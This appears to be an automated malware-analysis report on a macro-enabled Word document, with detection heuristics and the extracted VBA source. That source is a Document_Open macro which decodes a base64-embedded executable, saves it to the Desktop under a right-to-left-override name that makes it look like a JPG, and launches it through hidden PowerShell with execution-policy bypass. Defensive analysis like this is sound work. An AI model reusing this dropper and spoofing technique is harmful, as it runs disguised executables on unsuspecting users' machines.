MALICIOUS
Risk Score: 450
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains a Document_Open VBA macro that uses WScript.Shell to execute PowerShell. The macro appears to be designed to download and run a second-stage payload, as indicated by the 'Shell() call in VBA' and 'PowerShell reference in VBA' heuristics. The reconstructed command line 'powershell.exe -W Hidden -Exec By' suggests an attempt to run a hidden PowerShell process. In the extracted script shown below, the payload is carried inline as a base64 string assembled in the macro, decoded with [Convert]::FromBase64String, written to the user's Desktop under a filename containing a right-to-left override character ([char]8238, which makes the trailing 'gpj.exe' render reversed as 'exe.jpg'), and then launched with 'start'. The MsgBox prompt in the macro describes the file as a Microsoft WDATP Preview/Trial demo attack scenario.
Heuristics (12)

- ClamAV: Doc.Downloader.Pwshell-10001336-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings). Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script:
  Set oShell = CreateObject("Wscript.Shell")
  Dim strArgs, strArgs1, strArgs2
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script:
  strArgs1 = "powershell.exe -W Hidden -Exec Bypass -Command cd /;" & _
  "$file= [Convert]::FromBase64String([string]'"
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  Set oShell = CreateObject("Wscript.Shell")
  Dim strArgs, strArgs1, strArgs2
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script:
  Attribute VB_Customizable = True
  Private Sub Document_Open()
- Heap-spray pattern detected (high, SC_HEAP_SPRAY). Repeated 0x41 (A) bytes found. Note that 0x41 is the ASCII character 'A', and the extracted macro below embeds its payload as base64 text containing long runs of 'A' (which encode zero bytes), so this pattern is consistent with the encoded payload rather than with shellcode staged for a heap spray.
Disassembly
Attempted x86 opcode disassembly of the 0x41 run.
- Reference to PowerShell (high, SC_STR_POWERSHELL). Reference to PowerShell
- Reference to Windows Script Host (high, SC_STR_WSCRIPT). Reference to Windows Script Host
- LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND). Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18529 bytes |

SHA-256: d6b524fc7d785c1ce6456f489f84459a07ff1b86eebcf528bb29ea3a907dd9b5

Detection
ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 17 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Dim x As Integer
x = MsgBox("You are about to run a demo attack scenario provided as part of the Microsoft WDATP Preview/Trial program. Click OK to confirm and continue, or Cancel to terminate", 1)
If x = 1 Then
Dim a As String
a = ""
a = a & "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCAOAsm1gAAAAAAAAAAPAAIgALAjAAACoAAAAGAAAAAAAAAAAAAAAgAAAAAABAAQAAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAAEAAAAAAAABAAAAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABgAADMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcEQAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAABIAAAAAAAAAAAAAAAudGV4dAAAAJAoAAAAIAAAACoAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAADMBAAAAGAAAAAGAAAALAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAAAAgAFAFglAAAYHwAAAQAAABwAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeAnsBAAAEKiICA30BAAAEKh4CewIAAAQqIgIDfQIAAAQqHgJ7AwAABCoiAgN9AwAABCoAEzAFADcAAAABAAARAnsGAAAEcgEAAHB+BAAABBIA/hUCAAACEgADKAIAAAYSAAQoBAAABhIABSgGAAAGBm8BAAArKnYCchkAAHAefgUAAARzDQAACn0GAAAEAigOAAAKKgAAABMwBABOAAAAAgAAERI"
a = a & "eUxpbWl0ZWRJbmZvcm1hdGlvbgBTZXRJbmZvcm1hdGlvbgBRdWVyeUluZm9ybWF0aW9uAFZpcnR1YWxNZW1vcnlPcGVyYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBUZWxlbWV0cnlPcHRpb24ARXhjZXB0aW9uAFRvcERvd24AZ2V0X0luZm8Ac2V0X0luZm8ARmlsZVZlcnNpb25JbmZvAEdldFZlcnNpb25JbmZvAFByb2Nlc3NTdGFydEluZm8AQ29uc29sZUtleUluZm8AaW5mbwBaZXJvAGxwQnVmZmVyAGdldF9Qcm9jZXNzSGFuZGxlcgBzZXRfUHJvY2Vzc0hhbmRsZXIAQ3VycmVudFVzZXIAbHBQYXJhbWV0ZXIALmN0b3IALmNjdG9yAEludFB0cgBwdHIAU3lzdGVtLkRpYWdub3N0aWNzAGR3TWlsbGlzZWNvbmRzAHNldF9LZXl3b3JkcwBFdmVudEtleXdvcmRzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAExhcmdlUGFnZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAHNldF9UYWdzAEV2ZW50VGFncwBkd0NyZWF0aW9uRmxhZ3MAUHJvY2Vzc0FjY2Vzc0ZsYWdzAGZsYWdzAEV2ZW50U291cmNlU2V0dGluZ3MAYXJncwBQcm9jZXNzRXh0ZW5zaW9ucwBFdmVudFNvdXJjZU9wdGlvbnMAUnVudGltZUhlbHBlcnMATm9BY2Nlc3MAcHJvY2Vzc0FjY2VzcwBDcmVhdGVQcm9jZXNzAGhQcm9jZXNzAE9wZW5Qcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAHRlbGVtZXRyeVRyYWl0cwB"
a = a & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
Set oShell = CreateObject("Wscript.Shell")
Dim strArgs, strArgs1, strArgs2
strArgs1 = "powershell.exe -W Hidden -Exec Bypass -Command cd /;" & _
"$file= [Convert]::FromBase64String([string]'"
strArgs2 = "');" & _
"$filename= 'WinATP-Intro-Backdoor'+[char]8238+'gpj.exe';" & _
"$desktop=[Environment]::GetFolderPath('Desktop');" & _
"$fullpath = Join-path $desktop $filename;" & _
"[io.file]::WriteAllBytes($fullpath,$file);" & _
"copy $fullpath $desktop;" & _
"start $fullpath;"
strArgs = strArgs1 & a & strArgs2
oShell.Run strArgs, 0, False
Else:
End If
End Sub
Attribute VB_Name = "NewMacros"
Sub Buga()
'
' Buga Macro
'
'
End Sub